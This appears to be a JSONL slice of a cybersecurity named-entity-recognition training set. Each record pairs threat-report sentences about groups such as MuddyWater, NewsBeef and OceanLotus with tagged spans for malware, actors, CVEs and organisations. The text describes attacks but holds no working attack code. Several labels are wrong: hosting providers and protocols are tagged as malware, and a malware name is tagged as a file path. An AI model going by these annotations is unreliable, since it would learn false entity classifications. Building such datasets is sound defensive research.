{"text": "However , the actual text would often only display a basic welcome message . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites . The symbol “ g_bCreateListenSck ” is set to 1 . Of the two file types , the PowerPoint files are more unusual in that they would not show any actual slides when opened , but would still execute the malicious VBA code , a finding consistent with CERT - UA ’s analysis .", "spans": {"THREAT_ACTOR: Barium": [[150, 156]], "ORGANIZATION: social media": [[208, 220]]}, "info": {"id": "cyberner_stix_train_001286", "source": "cyberner_stix_train"}}
{"text": "Within weeks of eviction , the threat actors attempt to access their ChinaChopper web shells from previously used IP addresses .", "spans": {"MALWARE: ChinaChopper": [[69, 81]], "TOOL: web shells": [[82, 92]]}, "info": {"id": "cyberner_stix_train_001287", "source": "cyberner_stix_train"}}
{"text": "Check if chat apps are running In the above example , the malware is searching for Line , Facebook Messenger and WhatsApp activities . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets . The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder . Device Registration APT29 has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account .", "spans": {"SYSTEM: Facebook Messenger": [[90, 108]], "SYSTEM: WhatsApp": [[113, 121]], "MALWARE: RIPTIDE": [[291, 298]], "MALWARE: HIGHTIDE": [[427, 435]], "THREAT_ACTOR: Device Registration APT29": [[551, 576]]}, "info": {"id": "cyberner_stix_train_001288", "source": "cyberner_stix_train"}}
{"text": "If not , the response is scrubbed of the strings used to complete the billing fraud . Althoughthe BariumDefendants have relied on differentand distinct infrastructures in an effortto evade detection , Bariumused the same e-mail address (hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers . In this manner , ZxShell is able to completely hide itself , intercepting the following Kernel API calls : ZwAllocateVirtualMemory , ZwOpenEvent , ZwQueryDirectoryFile , ZwWriteFile , ZwEnumerateKey , and ZwDeviceIoControlFile . CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment .", "spans": {"THREAT_ACTOR: Barium": [[339, 345]], "MALWARE: ZxShell": [[409, 416]], "MALWARE: CADDYWIPER": [[621, 631]]}, "info": {"id": "cyberner_stix_train_001289", "source": "cyberner_stix_train"}}
{"text": "Once the cookie data is decoded , Suckfly has the network name , hostname , IP address , and the victim 's operating system information .", "spans": {"THREAT_ACTOR: Suckfly": [[34, 41]]}, "info": {"id": "cyberner_stix_train_001290", "source": "cyberner_stix_train"}}
{"text": "] ru/4 * * * * * 7 ” , containing a link to download the Trojan . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Moreover the new version searches for files generated by previous versions .", "spans": {"ORGANIZATION: Chronicle": [[92, 101]], "THREAT_ACTOR: Winnti": [[184, 190]]}, "info": {"id": "cyberner_stix_train_001291", "source": "cyberner_stix_train"}}
{"text": "The cybercriminals behind it kept the same masking and distribution methods , using names and icons imitating those of popular free ad services . We will see more from Zebrocy into 2019 on government and military related organizations . Both documents contained email addresses , phone numbers and contacts of members of official organizations such as United Nations , UNICEF , and Embassies linked to North Korea .", "spans": {"THREAT_ACTOR: Zebrocy": [[168, 175]], "ORGANIZATION: government": [[189, 199]], "ORGANIZATION: military": [[204, 212]], "TOOL: email": [[262, 267]], "ORGANIZATION: official organizations": [[321, 343]], "ORGANIZATION: United Nations": [[352, 366]], "ORGANIZATION: UNICEF": [[369, 375]], "ORGANIZATION: Embassies": [[382, 391]]}, "info": {"id": "cyberner_stix_train_001292", "source": "cyberner_stix_train"}}
{"text": "The group uses a mix of tools and malware , some developed by the group and others that are more generic tools .", "spans": {}, "info": {"id": "cyberner_stix_train_001293", "source": "cyberner_stix_train"}}
{"text": "Here , external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer ’s Choice spearphishing are of interest .", "spans": {"THREAT_ACTOR: APT28": [[16, 21]]}, "info": {"id": "cyberner_stix_train_001294", "source": "cyberner_stix_train"}}
{"text": "It is therefore important to note that , contrary to what might be assumed , we have actually observed a drop instead of an increase in Ukraine related campaigns from the Dukes following the country ’s political crisis .", "spans": {"THREAT_ACTOR: Dukes": [[171, 176]]}, "info": {"id": "cyberner_stix_train_001295", "source": "cyberner_stix_train"}}
{"text": "It allocates and fills four chunks of memory inside the service process . Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns . In this instance , the shellcode is configured to load an encoded backdoor from within the payload . OT asset owners leveraging IEC-104 compliant devices should take action to preempt potential in the wild deployment of COSMICENERGY .", "spans": {"THREAT_ACTOR: attacker group": [[96, 110]], "ORGANIZATION: OT asset owners": [[361, 376]], "SYSTEM: IEC-104 compliant devices": [[388, 413]], "MALWARE: COSMICENERGY": [[480, 492]]}, "info": {"id": "cyberner_stix_train_001296", "source": "cyberner_stix_train"}}
{"text": "In fact , as a sign of their arsenal ’s breadth , they had already decided to retire one of these malware toolsets as obsolete after developing a replacement for it , seemingly from scratch .", "spans": {}, "info": {"id": "cyberner_stix_train_001297", "source": "cyberner_stix_train"}}
{"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . PittyTiger could also use CVE-2014-1761 , which is more recent .", "spans": {"THREAT_ACTOR: PittyTiger": [[139, 149]], "VULNERABILITY: CVE-2014-1761": [[165, 178]]}, "info": {"id": "cyberner_stix_train_001298", "source": "cyberner_stix_train"}}
{"text": "The C & C server then responds with a configuration file , containing the personal identification number for the device and some settings — the time interval between contacting the server , the list of modules to be installed and so on . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries .", "spans": {"VULNERABILITY: Flash Player exploit": [[273, 293]], "VULNERABILITY: CVE-2016-4117": [[296, 309]], "MALWARE: Helminth": [[359, 367]], "TOOL: C2": [[487, 489]], "MALWARE: HTTP": [[508, 512]], "MALWARE: DNS": [[517, 520]]}, "info": {"id": "cyberner_stix_train_001299", "source": "cyberner_stix_train"}}
{"text": "These early campaigns were distributed via the Lerspeng downloader while later campaigns occasionally used Pony or Andromeda as intermediate loaders to distribute various instances of Dridex .", "spans": {"MALWARE: Lerspeng": [[47, 55]], "TOOL: downloader": [[56, 66]], "MALWARE: Pony": [[107, 111]], "MALWARE: Andromeda": [[115, 124]], "MALWARE: Dridex": [[184, 190]]}, "info": {"id": "cyberner_stix_train_001300", "source": "cyberner_stix_train"}}
{"text": "This can result in brand degradation , loss of individual reputation , or loss of consumer trust . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 .", "spans": {"THREAT_ACTOR: group": [[103, 108]], "TOOL: legitimate administration tools": [[114, 145]], "ORGANIZATION: PwC UK": [[310, 316]], "ORGANIZATION: BAE Systems": [[321, 332]], "THREAT_ACTOR: APT10": [[408, 413]]}, "info": {"id": "cyberner_stix_train_001301", "source": "cyberner_stix_train"}}
{"text": "INDRIK SPIDER consists of experienced malware developers and operators who have likely been part of the group since the early days of Dridex operations , beginning in June 2014 . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[0, 13]], "TOOL: Dridex": [[134, 140]], "TOOL: Flash": [[191, 196]], "VULNERABILITY: zero day": [[261, 269]], "VULNERABILITY: CVE-2016-4171": [[270, 283]]}, "info": {"id": "cyberner_stix_train_001302", "source": "cyberner_stix_train"}}
{"text": "Kaspersky witnessed the ScarCruft threat actor extensively testing a known public exploit during its preparation for the next campaign . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Upon decrypting and executing , it drops two additional files wsc_proxy.exe” (legitimate Avast executable) and a malicious DLL wsc.dll” in the %TEMP% folder . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . In addition , a current ANY.RUN playback of our observed Elise infection is also available . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Although it has focused most of its efforts on the Middle East region , the political affiliations , motives and purposes behind MuddyWater’s attacks are not very well- defined , thus earning it its name . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their ACT to victims in countries such as Belarus and Ukraine . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor . We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Trend Micro™ Deep Discovery™ provides detection , in-depth analysis , and proactive response to today’s stealthy malware , and targeted attacks in real time . MuddyWater first surfaced in 2017 . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . MuddyWater compiles various offensive Python scripts . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions . The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016 . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian and Western targets , and lacks advanced offensive technology development capabilities . However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor . The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . However , Kaspersky Security Network records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US” , the same hosting provider that the group used in attacks over the summer of 2016 . NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . A high volume of redirections from the compromised site continues into mid-January 2017 . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset aACT from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Its attack activities can be traced back to April 2012 . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . These APT attacks and adopting confrontation measures will exist for a long time . OceanLotus’ targets are global . OceanLotus have been actively using since at least early 2018 . OceanLotus malware family samples used no earlier than 2017 . we identified two methods to deliver the KerrDown downloader to targets . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group was first revealed and named by SkyEye Team in May 2015 . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9], [6547, 6556]], "THREAT_ACTOR: ScarCruft": [[24, 33]], "VULNERABILITY: CVE-2018-0798": [[137, 150], [882, 895], [1022, 1035], [1165, 1178]], "VULNERABILITY: CVE-2017-11882": [[299, 313], [1439, 1453]], "VULNERABILITY: CVE-2018-0802": [[318, 331]], "MALWARE: weaponizer": [[338, 348]], "THREAT_ACTOR: actors": [[397, 403]], "FILEPATH: wsc_proxy.exe”": [[615, 629]], "TOOL: DLL": [[676, 679]], "FILEPATH: wsc.dll”": [[680, 688]], "FILEPATH: AsyncRAT": [[816, 824]], "VULNERABILITY: exploit": [[872, 879], [1125, 1132], [1737, 1744]], "THREAT_ACTOR: threat groups": [[990, 1003], [1099, 1112]], "MALWARE: RTF weaponizer": [[1045, 1059]], "FILEPATH: ANY.RUN": [[1304, 1311]], "FILEPATH: Elise": [[1337, 1342]], "TOOL: Word": [[1396, 1400]], "FILEPATH: 'NavShExt.dll'": [[1520, 1534]], "FILEPATH: iexplore.exe": [[1565, 1577]], "VULNERABILITY: CVE-2017-1182": [[1745, 1758]], "FILEPATH: Microsoft Equation Editor": [[1776, 1801]], "FILEPATH: 'EQNEDT32.exe'": [[1804, 1818]], "ORGANIZATION: Check Point": [[1992, 2003]], "FILEPATH: POWERSTATS": [[2176, 2186]], "FILEPATH: PowerShell backdoor": [[2201, 2220]], "FILEPATH: backdoor": [[2258, 2266], [4353, 4361]], "FILEPATH: SPK KANUN": [[2445, 2454]], "FILEPATH: CiscoAny.exe”": [[2579, 2592]], "MALWARE: INF files": [[2595, 2603]], "THREAT_ACTOR: MuddyWater": [[2634, 2644], [3270, 3280], [3414, 3424], [4076, 4086], [4216, 4226], [4641, 4651], [4798, 4808], [4830, 4840]], "MALWARE: Advpack.dll": [[2681, 2692]], "MALWARE: IEAdvpack.dll": [[2701, 2714]], "FILEPATH: VBA2Graph": [[2740, 2749]], "THREAT_ACTOR: MuddyWater’s": [[2958, 2970], [3770, 3782]], "THREAT_ACTOR: MuddyWater's": [[3112, 3124]], "TOOL: emails": [[3364, 3370], [4380, 4386], [5602, 5608]], "TOOL: PowerShell": [[3756, 3766], [3848, 3858], [3880, 3890], [6327, 6337]], "MALWARE: POWERSTATS backdoor": [[3789, 3808]], "FILEPATH: .dll file": [[3916, 3925]], "MALWARE: backdoor": [[3933, 3941]], "THREAT_ACTOR: Muddywater": [[4010, 4020]], "ORGANIZATION: Turkish government organizations": [[4094, 4126]], "ORGANIZATION: finance": [[4142, 4149]], "ORGANIZATION: energy": [[4154, 4160]], "ORGANIZATION: Trend Micro™": [[4482, 4494]], "THREAT_ACTOR: attacks": [[4618, 4625]], "MALWARE: Python": [[4868, 4874]], "MALWARE: scripts": [[4875, 4882]], "TOOL: Python": [[4899, 4905]], "FILEPATH: Stageless Meterpreter": [[4930, 4951]], "FILEPATH: Ext_server_stdapi.x64.dll”": [[4960, 4986]], "FILEPATH: Ext_server_extapi.x64.dll”": [[4989, 5015]], "FILEPATH: Ext_server_espia.x64.dll”": [[5022, 5047]], "THREAT_ACTOR: BeEF-related": [[5147, 5159]], "THREAT_ACTOR: NewsBeef": [[5213, 5221], [5399, 5407], [5532, 5540], [5800, 5808], [5902, 5910], [6059, 6067], [6214, 6222], [6758, 6766], [7074, 7082], [7366, 7374], [7573, 7581], [8126, 8134]], "MALWARE: macro-enabled Office documents": [[5445, 5475]], "MALWARE: PowerSploit": [[5478, 5489], [6024, 6035], [8255, 8266]], "MALWARE: Pupy backdoor": [[5500, 5513]], "MALWARE: Flash": [[5994, 5999]], "MALWARE: Chrome installers": [[6004, 6021]], "MALWARE: Pupy tools": [[6042, 6052]], "ORGANIZATION: Microsoft": [[6266, 6275]], "THREAT_ACTOR: NewsBeef's": [[6516, 6526]], "TOOL: Outlook": [[6631, 6638], [6712, 6719]], "FILEPATH: outlook.live.com”": [[6650, 6667]], "MALWARE: Choopa": [[6812, 6818]], "MALWARE: LLC": [[6821, 6824]], "MALWARE: US”": [[6827, 6830]], "ORGANIZATION: NTG’s": [[6916, 6921]], "THREAT_ACTOR: NewsBeef’s": [[6960, 6970]], "THREAT_ACTOR: targets": [[7297, 7304]], "MALWARE: JavaScript": [[7729, 7739]], "FILEPATH: JavaScript": [[7761, 7771]], "THREAT_ACTOR: redirections": [[8003, 8015]], "MALWARE: Office documents": [[8236, 8252]], "MALWARE: Pupy": [[8273, 8277]], "THREAT_ACTOR: OceanLotus": [[8515, 8525], [8747, 8757], [8811, 8821], [9263, 9273]], "ORGANIZATION: adopting confrontation measures": [[8653, 8684]], "THREAT_ACTOR: OceanLotus’": [[8714, 8725]], "FILEPATH: KerrDown": [[8914, 8922], [8980, 8988], [9155, 9163]], "THREAT_ACTOR: OceanLotus's": [[9410, 9422]], "ORGANIZATION: maritime institutions": [[9447, 9468]], "ORGANIZATION: maritime construction": [[9471, 9492]], "ORGANIZATION: scientific research institutes": [[9495, 9525]], "ORGANIZATION: shipping enterprises": [[9530, 9550]]}, "info": {"id": "cyberner_stix_train_001303", "source": "cyberner_stix_train"}}
{"text": "The G DATA SecurityLabs are convinced that the number of similarities identified between EvilBunny and Babar show that both malware families originate from the same developers . The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities .", "spans": {"ORGANIZATION: G DATA SecurityLabs": [[4, 23]], "TOOL: EvilBunny": [[89, 98]], "TOOL: Babar": [[103, 108]], "VULNERABILITY: EternalBlue": [[198, 209]], "VULNERABILITY: exploit": [[210, 217], [270, 277]], "MALWARE: Metasploit": [[221, 231]], "THREAT_ACTOR: actors": [[260, 266]]}, "info": {"id": "cyberner_stix_train_001304", "source": "cyberner_stix_train"}}
{"text": "Once a user downloads a malicious app , it silently registers receivers which establish a connection with the C & C server . The primary goal of these attacks was likely to find code-signing certificates for signing future malware . with the goal of retrieving a new updated list . Danbot , Shark , and Milan use both DNS and HTTPS for C2 communications , while Marlin uses the OneDrive API for C2 communications .", "spans": {"MALWARE: Danbot": [[282, 288]], "MALWARE: Shark": [[291, 296]], "MALWARE: Milan": [[303, 308]], "SYSTEM: DNS": [[318, 321]], "SYSTEM: HTTPS": [[326, 331]], "SYSTEM: C2 communications": [[336, 353], [395, 412]], "MALWARE: Marlin": [[362, 368]], "SYSTEM: OneDrive API": [[378, 390]]}, "info": {"id": "cyberner_stix_train_001305", "source": "cyberner_stix_train"}}
{"text": "Command to change the beaconing changeArchive : The final command of the activation cycle is the download of an archive . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS . When the DLL is initially loaded , it dynamically resolves and imports additional modules ( DLLs ’ ) needed . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": {"TOOL: backdoor": [[185, 193]], "TOOL: POWERSTATS": [[206, 216]], "TOOL: DLL": [[228, 231]], "TOOL: DLLs": [[311, 315]], "MALWARE: INDUSTROYER": [[386, 397]], "MALWARE: INDUSTROYER.V2": [[402, 416]]}, "info": {"id": "cyberner_stix_train_001306", "source": "cyberner_stix_train"}}
{"text": "Loading the decrypted .dex file into memory and triggering the main payload Main payload When the main payload is loaded into memory , the initial detonator hands over the control to the main payload by invoking the method XoqF ( which we renamed to triggerInfection during analysis ) from the gvmthHtyN class ( renamed to PayloadEntry ) . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government . This NanoCore RAT is version 1.2.2.0 which has been found to be offered for free on the Dark Web just a few months . The threat actor targets individuals and employees that may have access to a Facebook Business account with an information - stealer malware .", "spans": {"ORGANIZATION: Navy": [[391, 395]], "THREAT_ACTOR: group": [[517, 522]], "THREAT_ACTOR: APT15": [[538, 543]], "THREAT_ACTOR: cyber espionage": [[567, 582]], "MALWARE: NanoCore": [[653, 661]], "ORGANIZATION: Dark Web": [[736, 744]], "THREAT_ACTOR: threat actor": [[769, 781]], "ORGANIZATION: individuals and employees that may have access to a Facebook Business account": [[790, 867]]}, "info": {"id": "cyberner_stix_train_001307", "source": "cyberner_stix_train"}}
{"text": "When reviewing the decrypted packet , it ’ s clear it has the same content as previous versions . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . They then proceeded to log directly into the VPN using the credentials of the compromised user .", "spans": {"TOOL: INF files": [[98, 106]], "THREAT_ACTOR: MuddyWater": [[137, 147]], "TOOL: Advpack.dll": [[184, 195]], "TOOL: IEAdvpack.dll": [[204, 217]], "TOOL: VPN": [[265, 268]], "MALWARE: credentials of the compromised user": [[279, 314]]}, "info": {"id": "cyberner_stix_train_001308", "source": "cyberner_stix_train"}}
{"text": "MINIDUKE : First known activity Loader July 2010 , Backdoor May 2011 Most recent known activity Loader : Spring 2015 , Backdoor : Summer 2014 C&C communication methods HTTP(S) , Twitter , Known toolset components Downloader , Backdoor , Loader .", "spans": {"MALWARE: MINIDUKE": [[0, 8]], "TOOL: C&C": [[142, 145]], "TOOL: Twitter": [[178, 185]], "TOOL: Downloader": [[213, 223]], "TOOL: Backdoor": [[226, 234]], "TOOL: Loader": [[237, 243]]}, "info": {"id": "cyberner_stix_train_001309", "source": "cyberner_stix_train"}}
{"text": "Microsoft patched this vulnerability in September 2012 , suggesting that this watering hole attack used an older vulnerability , which aligns with the threat groups continued use of older vulnerabilities in their spear-phishing efforts . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: threat groups": [[151, 164]], "ORGANIZATION: individual": [[260, 270]], "THREAT_ACTOR: actors": [[284, 290]]}, "info": {"id": "cyberner_stix_train_001310", "source": "cyberner_stix_train"}}
{"text": "Static analysis of the code reveals that the malware downloads the overlay template to use against any of the bank ( s ) it is targeting . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . The obfuscations looked similar to the ones explained in Hex-Rays blog , These disruptive cyber operations began in January 2022 , prior to Russia ’s illegal further invasion of Ukraine and have continued throughout the war .", "spans": {"THREAT_ACTOR: APT38": [[152, 157]], "ORGANIZATION: financial institutions": [[218, 240]], "ORGANIZATION: Ukraine": [[421, 428]]}, "info": {"id": "cyberner_stix_train_001311", "source": "cyberner_stix_train"}}
{"text": "This analysis dissects FakeSpy ’ s Chunghwa Post app version , which emerged in April 2020 . On June 19 , 2019 , FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks .", "spans": {"MALWARE: FakeSpy": [[23, 30]], "ORGANIZATION: FireEye’s": [[113, 122]], "ORGANIZATION: FireEye": [[216, 223]], "MALWARE: RATs": [[255, 259]], "MALWARE: NjRat": [[268, 273]], "MALWARE: Lokibot": [[296, 303]], "TOOL: C2": [[329, 331]]}, "info": {"id": "cyberner_stix_train_001312", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors have used Java exploits in their SWCs . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "VULNERABILITY: Java exploits": [[25, 38]], "TOOL: SWCs": [[48, 52]], "ORGANIZATION: Novetta": [[120, 127]], "MALWARE: Winnti malware samples": [[164, 186]]}, "info": {"id": "cyberner_stix_train_001313", "source": "cyberner_stix_train"}}
{"text": "Additionally new endpoint was added that seems related to downloading a module for the malware , probably with new features or configuration . APT10 is a threat actor that has been active since at least 2009 . Logs keystrokes and mouse movement Captures screenshots Opens cmd.exe shell Enumerates processes Executes programs Removes itself Enumerates all opening TCP and UDP ports .", "spans": {"THREAT_ACTOR: APT10": [[143, 148]], "FILEPATH: cmd.exe": [[272, 279]]}, "info": {"id": "cyberner_stix_train_001314", "source": "cyberner_stix_train"}}
{"text": "For this task , I used PassiveTotal ’s Passive DNS and AutoFocus Maltego transforms .", "spans": {"TOOL: PassiveTotal ’s Passive DNS": [[23, 50]], "TOOL: AutoFocus Maltego transforms": [[55, 83]]}, "info": {"id": "cyberner_stix_train_001315", "source": "cyberner_stix_train"}}
{"text": "We named the malware Skygofree , because we found the word in one of the domains * . MuddyWater first surfaced in 2017 . The group has been known to target organizations in order to use their access to then compromise additional victims .", "spans": {"MALWARE: Skygofree": [[21, 30]], "THREAT_ACTOR: MuddyWater": [[85, 95]]}, "info": {"id": "cyberner_stix_train_001316", "source": "cyberner_stix_train"}}
{"text": "The block is decrypted using a customized algorithm that uses a key derived from the original malware dropper ’ s TimeDateStamp field multiplied by 5 . APT33 often conducts spear-phishing operations using a built-in phishing module . Side-loaded DLL Loads next-stage payload using custom .png steganography Uses AES128 implementation from Crypto++ library for payload decryption Known to load Denes backdoor , might possibly be used also with other payloads . Threat actors regularly adapt and make use of red team tools - such as commercial and publicly available exploitation frameworks - to facilitate real world attacks , like TEMP.Veles ’ use of METERPRETER during .", "spans": {"THREAT_ACTOR: APT33": [[152, 157]], "TOOL: DLL": [[246, 249]], "TOOL: custom .png steganography": [[281, 306]], "TOOL: Crypto++ library": [[339, 355]], "MALWARE: Denes backdoor": [[393, 407]], "ORGANIZATION: Threat actors": [[460, 473]], "TOOL: red team tools": [[506, 520]], "MALWARE: TEMP.Veles": [[631, 641]], "TOOL: METERPRETER": [[651, 662]]}, "info": {"id": "cyberner_stix_train_001317", "source": "cyberner_stix_train"}}
{"text": "All of the files that are being uploaded or downloaded are zip files encrypted by AES with ECB mode . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . XOR and RC4 encryption is used with quite long unique keys for different . By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": {"THREAT_ACTOR: APT33": [[132, 137]], "ORGANIZATION: oil refining": [[189, 201]], "ORGANIZATION: petrochemicals": [[206, 220]], "THREAT_ACTOR: Winnti group": [[484, 496]]}, "info": {"id": "cyberner_stix_train_001318", "source": "cyberner_stix_train"}}
{"text": "Then , it uses the accessibility service for its malicious operations , some of which include : Preventing the user from uninstalling the app Becoming the default SMS app by changing device settings Monitoring the currently running application ( s ) Scraping on-screen text Android operating systems include many dialog screens that require the denial , or approval , of app permissions and actions that have to receive input from the user by tapping a button on the screen . Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it .", "spans": {"SYSTEM: Android": [[274, 281]], "THREAT_ACTOR: group": [[509, 514]], "MALWARE: Clayslide": [[829, 838]]}, "info": {"id": "cyberner_stix_train_001319", "source": "cyberner_stix_train"}}
{"text": "The parameters “ wth ” and “ qlt ” specify “ width ” and “ quality ” .", "spans": {}, "info": {"id": "cyberner_stix_train_001320", "source": "cyberner_stix_train"}}
{"text": "A malware sample using two separate unique user agent strings is uncommon .", "spans": {}, "info": {"id": "cyberner_stix_train_001321", "source": "cyberner_stix_train"}}
